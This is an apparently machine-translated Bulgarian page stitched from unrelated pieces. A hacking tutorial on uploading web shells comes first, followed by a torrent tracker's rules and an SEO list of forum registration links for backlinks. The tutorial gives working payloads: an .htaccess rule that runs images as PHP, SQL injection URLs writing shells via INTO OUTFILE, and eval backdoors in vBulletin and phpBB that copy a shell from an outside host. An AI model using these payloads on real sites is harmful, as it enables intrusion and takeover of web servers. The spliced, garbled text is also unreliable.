|
Здравейте %username% и неговите приятели. Е, трябва спешно да качите черупка на сайта, е, никога не се знае, може би крайната такса зависи от това. Е, просто не се получава. Тук събрах няколко примера (благодаря на Трейси и други за това).
Нека излеем черупката през картината
Вие сте хакнали сайт (разбира се, че само тествате) с персонализиран административен панел... И не можете да качите уеб обвивка, но има качване на снимки и зарежда само формати .jpg, .gif, .png.
Какво може да се направи в този случай?
Пъхаме обвивката с разширение .gif в някаква папка със снимки и създаваме .htaccess файл със съдържанието
AddType приложение/x-httpd-php .gif
Тази команда ще изпълни формата .gif като php
Опитвам се да отворя /shell.gif
Освен това, ако скриптът не е безразличен към прекъсванията на редовете, ние се опитваме да наводним обвивката, като едновременно с това я преименуваме на shell.php%00.jpg, проверете наличността на shell.php, какво ще стане, ако?
Метод за зареждане на обвивка чрез mysql.user от whine
1) Нека разберем под кого седим и също така да разберем неговите права върху mysql.
site.com/index.php?id=1+and+1=0+union+Select+1,user(),3+--+
(Нека разберем под кого седим)
2) site.com/index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+where+user=" нашия потребител
"+--+
(Нека проверим привилегиите на нашия потребител. Ако даде грешка по време на изхода, можете да шестнадесетичен нашия потребител 0x)
3) site.com/index.php?id=-1+union+select+1,"",3+from+mysql.user+into+outfile+" Път до файла
"+--+
(Попълнете миничерупката)
P.S.
За да работи всичко, трябва да имате права за запис и да знаете пълния път до корена.
Можете също да проверите разрешенията за запис по този начин:
site.com/index.php?id=1+and+1=0+union+Select+1," права
",3+от+mysql.user+--+
Ако се покаже prava, значи имате права.
Следната ситуация. Ние сме в админ панела на vBulletin форума
Да тръгваме:
Приставки и продукти -> Мениджър на приставки -> Приставки и продукти -> Мениджър на приставки -> [Добавяне на нов приставка] Изберете шаблони. Обикновено избираме faq_complete, избираме и щракваме квадратчето за отметка Plugin is Active, задаваме го на „Yes“ и запазваме.
localhost/forum/faq.php?cmd=phpinfo();
Ако сме отпечатали phpinfo(), тогава помислете за черупката в нашите ръце.
След това в phpinfo трябва да намерите пълния път до форума (например /home/u0000/site.ru/www/sell.php). След това трябва да превърнем нашата уеб обвивка в txt файл и да го качим на всеки уебсайт
mysite.com/shell.txt
Попълнете shell с команда
localhost/forum/faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
Какво прави този екип? Той копира съдържанието на променлива [a] в променлива [b], тоест shell.txt се копира в shell.php
Зареждане на обвивката в IPB 3
Да тръгваме:
Поддръжка->Управление на SQL->Текущи процеси->Изпълни нова заявка
Код:
изберете 0x3c3f706870696e666f28293b3f3e в outfile "Z:/home/site.ru/www/uploads/shell.php"
Можете да видите пълния път така:
Администратор->Поддръжка
Ще има PHP версия, написана в горната част, и връзка към PHPINFO вляво.
Shell тук:
http://site.com/uploads/shell.php
Качване на обвивката в phpBB 2
1. Създайте файла ex.sql
2. Регистрирайте се там
АКТУАЛИЗИРАНЕ phpbb_users SET user_sig_bbcode_uid="(.+)/e\0", user_sig="phpbb:eval(stripslashes($_GET[e]));" WHERE user_id=2;
Където user_id=2 е ID на администратора
3. Отидете в админ панела
4. В административния панел изберете елемента „Възстановяване на DB“ и изтеглете ex.sql
5. Изпълнете кода / Попълнете обвивката по този начин
Да тръгваме:
http://target/profile.php?mode=editprofile&e=phpinfo();
След:
http://target/profile.php?mode=editprofile&e=faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/ site.ru/www/sell.php
За да покажете phpinfo(), трябва да сте влезли.
Това е само кратък списък на това как и на кои двигатели може да се зареди черупката. Нуждаете се от повече? Добре дошли при момчетата от rdot
качване във форуми
пълнеж на cms
И ето любимата ми черупка, също на rdot))
Правила и ограничения на тракера. 1. Общи положения и ограничения
1.1. Тези правила на тракера не подлежат на обсъждане и трябва да се спазват безусловно от всички присъстващи на тракера. Само администраторите на Tracker имат право да не спазват някои разпоредби на правилата в изключителни ситуации.
1.2. Администрацията на тракера е единственият и най-висш орган, където могат да бъдат разрешени всякакви конфликтни ситуации, засягащи тракера и неговите потребители. По този начин решенията на Администраторите са окончателни и не подлежат на обжалване.
1.3. Администрацията на Tracker си запазва правото да променя и допълва всички клаузи на тези правила без предварително или последващо уведомление. Допълненията и промените в правилата влизат в сила от момента на публикуването им. Въпреки това, като акт на добра воля, Администрацията ще се опита, когато е възможно, да представи тези промени на вниманието на потребителите.
1.4. Непознаването на тези и други правила на Tracker не само не освобождава човек от отговорност за нарушаването им, но само по себе си е нарушение и утежняващо вината обстоятелство.
1.5. Забранено е използването на каквито и да е програми за фалшифициране на данни за вашето качване и изтегляне. Измамниците са незабавно баннати.
1.7. Забранено е използването на неизправности и грешки на тракера за лични цели. В случай на откриване на неизправности и грешки, трябва да уведомите администрацията на Tracker.
2. Регистрация
Регистрацията е неразделна част от присъствието в тракера. Регистрацията автоматично показва вашето съгласие с тези Правила. Ако не сте съгласни с тези Правила, пишете на администрацията.
2.1. РЕГИСТРАЦИЯТА ОТ РАЗЛИЧНИ ЧУЖДИ ПРОКСИ СЪРВЪРИ Е ЗАБРАНЕНА. Нарушители - незабавна забрана!!!
В изключителни случаи се допуска само след разглеждане на заявлението от администрацията.
2.2. ЗАБРАНЕНО Е РЕГИСТРИРАНЕ НА ПОВЕЧЕ ОТ ДВА АКАУНТА ОТ ЕДИН КОМПЮТЪР. В случай на нарушение всички съществуващи акаунти се забраняват.
Регистрацията на нов акаунт след съществуващите два е възможна само със съгласието на администрацията.
3. Правила за коментиране на ръце
3.1. Забранено е използването на нецензурни думи в коментари към раздавания, всякакви нецензурни думи и изрази, завоалирани нецензурни думи, включително на чужди езици.
Наказание: Премахване на коментари, които нарушават правилата и забрана за писане на коментари за период от 1 седмица. Последващо нарушение на това правило ще доведе до бан за период от 7 дни и забрана за писане на коментари за период от 14 дни. В бъдеще ще има постоянна забрана за писане на коментари.
3.2. Забранява се обиждането на участниците в тракера под каквато и да е форма. Забранява се всякаква грубост, лични обиди и нецензурни изказвания към други участници, накърняващи репутацията им, унижаващи честта и достойнството им, включително публична разправа на лични отношения, както в лични съобщения в тракера, така и в коментари към разпространения. Участниците трябва да поддържат уважителна комуникация.
Наказание: Премахване на нарушаващи правилата коментари и бан на нарушителя за период от 7 дни. Последващото нарушение на това правило води до бан за 7 дни и забрана за писане на коментари за 30 дни. В бъдеще ще има постоянна забрана за писане на коментари.
3.3. Забранени са заплахи от всякакъв характер (виртуални, реални и други заплахи срещу участниците в тракера).
Наказание: Изтриване на съобщения и баниране на нарушителя за 14 дни. Ако това правило бъде нарушено отново, ще бъдете баннати за един месец.
3.4. Фламиране (съобщения, които не са по темата, предназначени да започнат спор, както и персонализиране на дискутиращите), наводнение (съобщения, които не отговарят на темата, не носят семантично натоварване или се състоят само от емотикони), офтопик (съобщения, които не са свързани с обсъжданата тема) са забранени, както и стимули за флуд, флейм, офтопик и съобщения като: “Помощ”, “Проблем”, “За какво говориш, а?” или „Така че не разбирам - откъде да изтегля?“ и други подобни, които не са свързани с това разпространение. Един коментар може да съдържа не повече от 3 емотикони.
Наказание: Премахване на коментари, които нарушават правилата и предупреждение на автора на коментара за срок от 3 дни. Ако това правило бъде нарушено отново, авторът на коментара ще получи забрана за писане на коментари за период от 7 дни. В бъдеще за всяко нарушение се издава забрана за оставяне на коментари за период от 14 дни и забрана за изтегляне за период от 14 дни.
3.5. В коментарите е забранено публикуването на търговски съобщения, директна или индиректна реклама, спам съобщения и връзки към сайтове, които не са пряко свързани с разпространението.
Наказание: Премахване на реклама, забрана за писане на коментари за период от 7 дни и забрана за изтегляне за период от 7 дни. При повторно нарушение забрана за писане на коментари за срок от 15 дни и забрана за изтегляне за срок от 15 дни. В бъдеще ще има постоянна забрана за писане на коментари.
3.6. Забранено е в коментарите да се проявява расова, национална и религиозна вражда, да се агитират политически партии, да се пропагандира тероризъм, екстремизъм, наркотици, религия и други теми, несъвместими с общоприетите закони на морала и благоприличието.
Наказание: Премахване на коментари, които нарушават правилата, забрана за писане на коментари за период от 14 дни и забрана за изтегляне за период от 14 дни. При повторно нарушение забрана за писане на коментари за срок от 30 дни и забрана за изтегляне за срок от 30 дни. В бъдеще ще има постоянна забрана за писане на коментари.
3.7. Забранено е оставянето на коментари, които открито или скрито нарушават Наказателния кодекс на Руската федерация, както и съобщения, призоваващи към извършване на незаконни действия.
Наказание: Изтриване на съобщения, забрана за писане на коментари за период от 14 дни и забрана за изтегляне за период от 14 дни. При повторно нарушение, нарушителят получава забрана за срок от 30 дни. За третото нарушение - постоянна забрана.
3.8. Забранено е в коментарите към разпространението да се разкриват лични данни на потребители, поверителни данни, истински три имена, публикуване на снимки, разпространяване на информация за личния живот на участник в дискусията, която представлява негова лична или семейна тайна, без неговото съгласие.
Наказание: Премахване на нарушаващи правилата коментари и устно предупреждение към тракера. При повторно нарушение забрана за писане на коментари за срок от 7 дни. В бъдеще ще има забрана за писане на коментари за период от 30 дни.
3.9. Забранено е публикуването в коментари на изображения, съдържащи порнография, сцени на насилие или други изображения, които унижават или обиждат други потребители.
Наказание: Изтриване на коментари, които нарушават правилата и забрана за сваляне и оставяне на коментари за период от 7 дни. При повторно нарушение, потребителят получава бан за период от 7 дни. В бъдеще - забрана за период от 15 дни и постоянна забрана за писане на коментари.
3.10. Забранява се използването на език, различен от руски и шрифт, различен от кирилица в коментарите.
Наказание: Изтриване на съобщения и устно предупреждение към потребителя; при повторно нарушение на правилата на този параграф, забрана за писане на коментари за период от 3 дни.
3.11. Забранено е използването на следните методи за осветяване в съобщения: червено, повече от 75% главни букви и голям размер на шрифта - това е привилегия на модераторите и администраторите.
Наказание: Изтриване на съобщения и устно предупреждение към потребителя; при повторно нарушение на правилата на този параграф, забрана за писане на коментари за период от 7 дни.
3.12. Забранено е овъркотирането (цитиране на съобщения от други участници в количества, надхвърлящи разумните количества (повече от 10 реда от оригиналното съобщение)).
Наказание: Редактиране на съобщението и устно предупреждение на потребителя, при повторно нарушение на правилата на този параграф, забрана за писане на коментари за период от 3 дни.
3.13. Спойлерите са забранени и се въздържайте от използването на спойлери (разкриване на ключови моменти от сюжета, чието познаване може да развали зрителското изживяване за други, изхода от мача и т.н.).
Ако не можете без спойлери, тогава трябва да включите спойлера в тага [expand] и да поставите знака „Спойлер“ пред него.
Забележка: В „спортните“ разпределения е забранено да се развалят до 11 коментара (1 страница).
Наказание: Редактиране на съобщението и устно предупреждение на потребителя. Ако многократно нарушавате правилата на този параграф, ще ви бъде забранено да пишете коментари за период от 3 дни.
3.14. Забранено е публикуването на съобщения, съдържащи умишлено невярна информация.
Наказание: Премахване на нарушаващи правилата коментари и устно предупреждение към потребителя. Ако многократно нарушавате правилата на този параграф, ще ви бъде забранено да оставяте коментари за период от 7 дни.
Системата за коментари за торенти е предназначена да:
- Изразете своето уважение и благодарност към дарителя,
- Задайте конкретен въпрос, който ви интересува относно разпространението,
- Предоставете интересна информация, свързана с раздаването.
4. Ограничения за аватари и подписи:
4.1. Подпис:
- Максимална височина: 100 точки (с други думи, не повече от четири потребителски ленти или десет реда текст (размер на шрифта 10); ширина: 750 точки.
- Общото тегло на изображенията, съдържащи се в подписа, не трябва да надвишава 200 Kb.
- Съдържание: насилие, заплахи (на демографска, национална, религиозна или политическа основа), нецензурен език (нецензурни думи, обиди, грубост и др.), разврат (порнография), дискриминация под всякаква форма, текстове и изображения на реклами или рекламни са неприемлив характер, имитация на заглавия/рангове на този ресурс, както и провокативни изображения, вкл. използване на нацистки символи.
- Анимация: силно мигащите надписи са забранени (степента на мигане се определя от администрацията).
- Подписът под вашите съобщения не може да се използва за създаване на връзки към мрежови ресурси. (изключения са връзките към сайтове с потребителски ленти, услуги като youtube, google и др.)
4.2. Аватар:
- Максимален размер: 100х100 пиксела; тегло: до 21 KB.
- Съдържание: насилие, заплахи (на демографска, национална, религиозна или политическа основа), нецензурен език (нецензурен език, обидни имена, грубост и др.), разврат (порнография), дискриминация под всякаква форма, пропаганда на наркотици, търговска реклама и рекламни текстове, имитация на заглавия/рангове на този ресурс, умишлена прилика с аватари на членове на администрацията, както и провокативни изображения, вкл. използване на нацистки символи.
- Анимация: силно мигащите аватари са забранени (степента на мигане се определя от администрацията).
Наказание: Премахване на подпис и аватар или забрана за използването им (определя се от администратора).
5. Издания
5.1. Забранено е повторното качване на версии в други тракери без личното разрешение на издателя. Подпомагането на разпространението на издание, което е забранено за повторно качване на друг тракер, е еквивалентно на независимо повторно качване и се наказва в съответствие с клауза 7.
6. Други
6.1. Забранява се качването на съдържанието на дистрибуции чрез услуги за хостинг на файлове като vip-file, letitbit и други...
6.2. Забранено е използването на каквито и да било мениджъри за изтегляне за изтегляне на торенти.
7. Наказание:
За нарушения, посочени в параграфи 5-6 - забрана за 7 дни. Повторното нарушаване на тези правила ще доведе до доживотен бан.
Така че, мисля, че няма да изненадам никого, като кажа, че колкото повече външни връзки към вашия сайт, колкото по-голям е неговият TCI и колкото по-голям е TCI на препращащия сайт, толкова по-голяма е „тежестта“ на тази връзка. Има много начини да увеличите линк масата към вашия сайт, но днес ще говоря само за един от тях - получаване на външни връзки от надеждни сайтове.
В тази статия няма да давам всички връзки към доверителни сайтове, които познавам, но ще ви разкажа само за един от тях - форумите.
Като се регистрирате във форуми, където можете да посочите уебсайт (като правило, те се правят на същия двигател), ще получите външна връзка.
За да стане ясно за какво говорим, вижте екранната снимка по-долу:
Тоест, трябва просто да се регистрирате на такъв форум, като посочите сайта. Това е всичко. (Е, най-много все още трябва да потвърдите регистрацията си, така че посочете истинския си имейл). Обикновено страница с връзка към вашия сайт ще изглежда по следния начин:
Сега нека поговорим за недостатъците на този метод, според мен има два от тях:
1) Мисля, че рано или късно ще бъдете премахнат от форума за неактивност (Но по принцип няма да е трудно да се регистрирате отново).
2) Съответно е невъзможно да се зададе котва за връзка. (Това вероятно дори не е минус, а факт, но все пак).
Е, сега списък с дебели форуми. За удобство, в низходящ ред на TCI:
Връзка (TCI)
http://forum.igromania.ru/register.php (1700) [Регистрирайте се, след това посочете сайта в профила си, запазете]
http://orphus.ru/community/register.html (1500)
http://www.novosti-kosmonavtiki.ru/phpBB2/profile.php?mode=register (1100)
http://www.rmj.ru/phpbb/profile.php?mode=register (1000)
http://www.masterkit.ru/forum/profile.php?mode=register (700)
http://www.ib.ru/forum/profile.php?mode=register (400)
http://forum.mozilla-russia.org/register.php (300) [Посочете уебсайта в профила си]
http://mama-tv.ru/forum/profile.php?mode=register (230)
http://www.neodrive.ru/forum/profile.php?mode=register (170)
http://www.systemaspetsnaz.ru/pforum/profile.php?mode=register (150)
http://tele-club.ru/forum/profile.php?mode=register (130)
http://forum.anastasia.ru/profile.php?mode=register (130)
http://www.shalyapin.ru/forum/profile.php?mode=register (130)
http://www.sarinfo.org/forum/profile.php?mode=register (120)
http://nelubit.ru/profile.php?mode=register (100)
http://www.antisex.info/phpbb2/profile.php?mode=register (60)
http://forum.balletfriends.ru/profile.php?mode=register (50)
http://forum.rusbani.ru/profile.php?mode=register (50)
http://zoneland.ru/forum/profile.php?mode=register (40)
http://forum.av.by/profile.php?mode=register (30)
http://forummotor.israelinfo.ru/profile.php?mode=register (30)
http://wolfson.ru/forum/profile.php?mode=register (30)
http://forum.oslik.ru/profile.php?mode=register (30)
http://data-torrents.com/profile.php?mode=register (20)
http://forum.latfutbols.net/profile.php?mode=register (20)
http://www.forum.hyip-reflection.info/profile.php?mode=register (20)
http://wap.tanchiki.ru/for/profile.php?mode=register (10)
http://www.autoplustv.ru/forum/profile.php?mode=register (500)
http://www.spomir.ru/forum/profile.php?mode=register (350)
http://www.fireman.ru/talk/profile.php?mode=register (300)
http://www.fpss.ru/forum-new/profile.php?mode=register (240)
http://www.skaters.ru/forum/profile.php?mode=register (220)
http://www.a-ivanov.ru/forum/profile.php?mode=register (190)
http://abto-acc.ru/forum/profile.php?mode=register (150)
http://www.artdj.ru/forum/profile.php?mode=register (120)
http://doom-metal.ru/room/profile.php?mode=register (100)
http://www.frisbee.by/f/profile.php?mode=register&agreed=true (80)
http://www.texinfo.ru/forum/ucp.php?mode=register (80) [В профил]
http://globax.biz/forum/profile.php?mode=register (70)
http://www.gracebyte.com/forum/profile.php?mode=register (70)
http://forumjnews.israelinfo.ru/profile.php?mode=register (60)
http://yartech.ru/forum/ucp.php?mode=register (40) [В профил]
http://amrita-dance.ru/forum/profile.php?mode=register (30)
http://forum.isnet.ru/profile.php?mode=register (30)
http://forum.interair.ru/profile.php?mode=register (0
___________________________________________________________________
Последната актуализация на базата данни е на 16.06.11 г(Списъкът е изчистен от повредени връзки + добавени са още няколко сайта, които са под линията)
Освен това, благодарение на доверен сайт, можете не само да увеличите TIC, но и да увеличите трафика на сайта! Но за това ви трябват много добри сайтове за доверие и те, като правило, вече се продават за пари. Ами решете сами дали да ги купите или не...
В заключение мога да кажа, че не се регистрирайте наведнъж, във всички форуми наведнъж, в противен случай вашият сайт може да попадне под някакъв филтър. 5-8 на ден са достатъчни според мен. Всичко. Късмет. 😉
внимание!
Пиша тази бележка през 2015 г. и искам да кажа, че сега, по мое мнение, оставяйки връзки към вашия блог (сайт) на тези или други, по-нови сайтове за доверие, вие само ще си губите времето. Затова, за да избегна повтарящи се въпроси в коментарите, ще пиша тук - няма да има актуализации на този списък.
По-добре бих препоръчал да проверите моя списък. Разбира се, публикуването на съобщения в такива блогове също не е толкова ефективно, колкото преди, но, отново, според моето субективно мнение, е в пъти по-ефективно.
|
